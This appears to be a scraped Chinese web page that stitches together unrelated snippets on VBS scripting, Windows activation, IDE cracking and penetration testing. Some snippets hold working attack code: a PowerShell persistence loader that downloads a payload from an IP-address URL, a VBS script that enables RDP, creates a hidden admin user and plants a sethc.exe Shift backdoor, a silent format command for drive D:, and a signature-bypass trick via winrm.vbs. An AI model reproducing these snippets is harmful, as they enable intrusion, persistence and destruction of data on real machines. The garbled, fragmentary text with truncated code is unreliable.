最近限于自身的经济条件的限制,而我对网络的学习欲望愈发强烈。于是在这种情况下对使用GNS3模拟器模拟网络实验感兴趣起来。以下是我在使用GNS3过程中的一点小总结,特贴出来和大家共享。以下主要讲的是如何在GNS3中使用SecureCRT打开路由的配置页面和使用Wireshark软件进行抓包。
Vbs是一种Windows脚本,它的全称是:Microsoft Visual BasicScript Editon.(微软公司可视化BASIC脚本版),VBS是Visual Basic的的一个抽象子集,是系统内置的,用它编写的脚本代码不能编译成二进制文件,直接由Windows系统执行(实际是一个叫做宿主host的解释源代码并执行),高效、易学,但是大部分高级语言能干的事情,它基本上都具备,它可以使各种各样的任务自动化,可以使你从重复琐碎的工作中解脱出来,极大的提高工作效率。
这个就是用了DOS的命令。一个是改变文本颜色,一个是查看目录,这个操作不会破坏什么,只是看起来比较炫。
◎Vbs脚本编程简明教程之一 —为什么要使用Vbs?
@Tooshy丶师傅发来的一个MSSQL堆叠注入,测试中遇到一些问题,让我帮着看下能不能写Webshell或者直接反弹Shell?这个注入因存在WAF而不能直接用Sqlmap跑,所以全程都是在Burpsuite下进行测试的。
WebStorm 2024.1.2 是 WebStorm 2024.1 的第二次更新,现已推出!它包含对 Angular 的改进,并添加了 ESLint 9 支持。
然后点开文本文档进行编辑,最重要的一个代码就是msgbox,然后在后面添加想要说的话,但是要使用英文标点符号,换行时候都需要在前面加上代码,最后保存。
知识星球看到@紫陌师傅分享的一篇《利用IIS虚拟目录绕过os-shell中文目录》,所以想着对他文中提到的利用Adsutil.vbs脚本创建虚拟目录写马至中文路径的方式进行复现,但仅适用于低版本IIS,高版本要用appcmd。
之前我们说过FTP在非交互shell 下会出现没有办法输入密码,导致身份认证过程没有办法完整完成,这里我们就来介绍一下如何变通。
前言 PowerShsell Empire中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具。在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,都包裹在易用性为重点的框架,有点类似于像meterpreter。 Empire详情介绍参考官方网站:http://powershellempire.
Win10系统中会预安装Office,但是没有给JH,网上给了各种解决方案,如JH码、KMS等方式JH。
【1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/144726.html原文链接:https://javaforall.cn
#> #使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload function Add-Persistence() { #payload的路径 $payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2" #保存维权马的路径 $tmpdir = $env:APPDATA; #vbs路径 $payloadvbsloaderpath = "$tmpdir\_log.vbs" #下载payloa
安装IIS服务器 在C:\inetpub\wwwroot网站目录下放一个www.rar文件并且浏览器能够访问到
据Securityaffairs网站消息,具有俄罗斯背景的黑客组织UAC-0099正在利用WinRAR中的一个零日漏洞(已修复,编号CVE-2023-38831)对乌克兰传播LONEPAGE恶意软件。
注意,安装新版本 IDEA 之前,如果本机安装过老版本的 IDEA, 需要先彻底卸载,以免两者冲突,导致破解失败。
https://docs.microsoft.com/zh-cn/windows-server/get-started/kmsclientkeys
在这里需要用到一个脚本文件“DyRouter.vbs”。这里使用的就是在51下载上下的地址http://down.51cto.com/data/89880#
IntelliJ IDEA2022.1 新版本即将到来,你是否在为激活码频繁失效而苦恼?是否在为工具不稳定而忧桑?是否还在为每次繁琐的添加而无奈?好了,今天小编分享的工具,安全稳定,最重要的是,一键永久激活,免配置,告别繁琐操作,so easy!
创建一个text(.txt)文本,把代码复制进去,不要写注释,也不要在句尾留空格,保存,后缀改为.vbs。(代码中“要发送人的名字”改为你给别人的备注,次数100可以改为其他数字,间隔时间100可以改)
1、首先查看Office2016安装目录在哪里,如果是默认安装,没有修改路径,在C:\Program Files\Microsoft Office\Office16目录下,64位系统装32位office路径是C:\Program Files (x86)\Microsoft Office\Office16,具体路径还得自行查看;
这篇文章最后修改于 2022-08-21 日,距今已有 93 天,请注意甄别内容是否已经过时!
最近笔者所在学校U盘病毒肆虐,很多U盘都感染了病毒。具体症状为:我的电脑打不开或者提示windows脚本宿主错误;各分区下存在autorun.inf以及随机数字为文件名的vbs文件,无法彻底删除;文件关联被修改;插入U盘自动感染等。经过多次实战,现总结处理方式如下:
slmgr /ipk x-x-x-x-x 安装产品密钥,也可以说是替换现有密钥,就是那个5×5的序列号。
这是我在百度回答知友时写的,用于自动以管理员身份执行命令或程序→百度原址 批处理代码,功能:自动以管理员身份执行 test.exe: start admin.vbs runas /user:administrator test.exe admin.vbs 代码(延时是为了成功传值给 bat 命令,确保成功) dim wsh set wsh=WScript.CreateObject("WScript.Shell") WScript.Sleep 3000 wsh.SendKeys "你的
趁着现在不忙(才不是偷懒)赶紧更新一波~ 今天给大家分享的内容是Windows内网传输技术:
一直很想去试试搭建KMS服务器,一直也没有时间。最近空闲下来,专门研究了一下,其实十分简单。 而且vlmcsd支持几乎所有操作系统作为KMS服务器。 通过搭建后,支持Windows, Office激活。
今天早上打开文档,直接弹出一个提示:“此office2016副本尚未激活”,感觉一脸懵逼,,,怎么会呢?这版本安装的时候就是免激活的啊,想来是安全管家给删除或者禁止了,此前用软件激活过一次office版本,但是激活的同时把我的win10也重新激活了,由原来的专业版变为家庭版,甚是无语,所以这次就不用软件了,使用win10自带的Power shell命令激活。
云服务器大内网带宽的机型不少,对于内网带宽大于3Gbps的机器,使用iperf3压测时,可以多开几个进程,否则可能压不到上限。可以用iperf2或用微软的ctsTraffic。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/193252.html原文链接:https://javaforall.cn
把如下代码(具体化密码)另存为autologon.reg双击导入并重启机器即可实现自动登录(重启后打开vnc,发现已经自动登录到桌面)
1. 在系统中“我的电脑”上点鼠标右键选择“属性”。在系统属性窗口选择“高级”标签并按“环境变量”按钮;第二步:将环境变量设置窗口中的系统变量里的Path值中在原有的值后面添加SecureCRT.v5.5.2安装路径,比如下目录“;C:\Program Files\SecureCRT ”(不含引号),注意那个分号别少了
可以看到,该项目的Todo,依旧想的是围绕注册表去进行修改,为此我们先把注册表传输文件放一边 WMIHACKER的文件传输部分
=================================== VBS例子讲解--1: 用 run运行文件 set shl="createobject"("WScript.Shell") shl.run"regedit.exe" set shl="nothing" VBS例子讲解--2: 用 FSO复制文件 Set shl = CreateObject("Scripting.FileSystemObject") shl.CopyFile "c:\1.txt","d:\" set shl = nothing ========================================================= CreateObject 描述创建并返回对象的引用。语法 CreateObject(class) class 参数使用语法 servername.typename,有以下部分: 部分描述 servername 提供对象的应用程序名称。 typename 要创建的对象类型或类。 说明 Automation 服务器至少提供一种对象类型。例如,字处理应用程序可以提供应用程序对象、文档对象和工具条对象。要创建 Automation 对象,将 CreateObject 函数返回的对象赋值给某对象变量: Dim ExcelSheet Set ExcelSheet = CreateObject("Excel.Sheet") ' 使 Excel 在整个 Application 对象中都可见。 ExcelSheet.Application.Visible = True ' 将一些文本放入工作表的第一个单元格中。 ExcelSheet.ActiveSheet.Cells(1,1).Value = "This is column A, row 1" ' 保存工作表。 ExcelSheet.SaveAs "C:\TEST.XLS" ' 关闭 Excel,使 Quit 方法处于 Application 对象中。 ExcelSheet.Application.Quit ' 释放对象变量。 Set ExcelSheet = Nothing ================================== Set 将对象引用赋给一个变量或属性,或者将对象引用与事件关联。 createobject("WScript.Shell").run"regedit.exe" 和下面的 3句句有同样效果。 set shl="createobject"("WScript.Shell") shl.run"regedit.exe" set shl="nothing" 但如果我要使用多个 CreateObject对象的时候,就要写很多个 CreateObject("WScript.Shell")出来。内容如下: createobject("WScript.Shell").run"regedit.exe" CreateObject("WScript.Shell").popup"注册表已经被运行" 上面例子会给我们造成很多麻烦和工作量。这个时候我们可以使用 set来吧 CreateObject("WScript.Shell")对象付给一个变量。 以后只要对变量访问就相当于对 CreateObject("WScript.Shell")访问了。 set shl="createobject"("WScript.Shell") shl.run"regedit.exe" shl.popup"注册表已经被运行" set shl="nothing" Nothing 可选项。断开 shl与任何指定对象或类的关联。当没有其它变量引用前面的引用对象时,将 shl赋值为 Nothing 以释放与前面的引用对象相关联的系统或内存资源。 WScript 对象介绍属性/方法/对象。属性=一个物体本身具有的一种特性。方法=一个物体能够做某件事情,完成某件事情的时候就要用到方法。 WScript属性的演示例子:运行 WScript属性的格式为: WScript.属性名。 关于属性--实例: WScript.Echo (WScript.FullName) 'FullName 属性是代表主机可执行文件的完全限定路径的只读字符串。 WScript.Echo (WScript.Name) '返回 WScript 对象(主机可执行文件)的名称 WScript.Echo (WScript.Path) '返回包含主机可执行文件(CScript.exe 或 WScript.exe)的路径名称。 WScript.Echo WScript.ScriptName '返回当前运行脚本的文件名。 wscript.echo WScript.ScriptF
在这个网站共找到了3处SA权限的搜索型注入,随便在一个搜索框中输入'单引号后即会爆出语法错误。
大家在日常运维当中,如果Windows服务器的服务挂掉了怎么办,比如数据库、Tomcat、Redis等等。再比如赶上周末放假的话,是不是还需要紧急处理问题,然后一整天的好心情也就没有了,有没有什么好办法来解决这个问题呢。这里给大家介绍通过Bat脚本的方式,实现异常Windows服务的重启,这样再也不用担心服务器因为应用服务挂掉,还需要火急火燎的处理问题了。当然前提是你的应用服务应该配置为Windows服务的方式启动。大家一起来看看吧!
大家好,又见面了,我是你们的朋友全栈君。 xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集 2010年12月07日 xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本 vbson error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = “.” Set StdOut = WScript.StdOut Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_ strComputer & “\root\default:StdRegProv”) strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” strValueName = “fDenyTSConnections” dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” strValueName = “PortNumber” dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” strValueName = “PortNumber” dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject(“WScript.Shell”) success = obj.run(“cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cm
winrm.vbs(一个位于system32目录下的具有Windows签名的脚本文件)可以被用来调用用户定义的XSL文件,从而导致任意的、没有签名的代码执行。当用户向winrm.vbs提供'-format:pretty'或者'-format:text'参数时,winrm.vbs将从cscript.exe所在目录读取WsmPty.xsl或Wsmtxt.xsl文件。这意味着若将cscript.exe拷贝到攻击者可以控制的目录下,并将恶意的XSL文件也置于相同路径中,攻击者将可以绕过签名保护而执行任意代码。这个攻击手段和Casey Smith的wmic.exe技术很相像。
C站下载地址: https://download.csdn.net/download/qq_44866828/85451377
用途:针对frp.ngrok要在cmd下后台运行才行,每次打开是不是很麻烦?编写脚本开机自启动方便吧~~
Set oExec=WshShell.exec("c:\windows\system32\format.com d: /fs:ntfs /q /y")
ISO 镜像版本说明: (Consumer editions)包括:家庭版、教育版、专业版 (Business editions)包括:企业版、教育版、专业版
Windows有个坑是系统没激活导致的。高配机器内存只有2G可用,比如16G内存,resmon命令显示为硬件保留了14336M(整14G)内存,可用只有2G,也可以任务管理器 → 性能页签里的内存 → 右下侧看到为硬件保留的内存多少G(这里是四舍五入的,resmon命令显示的那个更为精确)
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
将test.vbs移动到C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp目录下;
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
*本文原创作者:lcx,本文属FreeBuf原创奖励计划,未经许可禁止转载 ** 在Windows系统中,为了节省内存和实现代码重用,微软在Windows操作系统中实现了一种共享函数库的方式。这就是DLL(Dynamic Link Library)文件,即动态链接库,这种库包含了可由多个程序同时使用的代码和数据。Rundll.exe 和 Rundll32.exe 的命令行实用程序,通过这两个程序可调用从16位或32位DLL导出的函数。现在Rundll.exe 基本被淘汰,rundll32.exe格式为:RU
领取专属 10元无门槛券
手把手带您无忧上云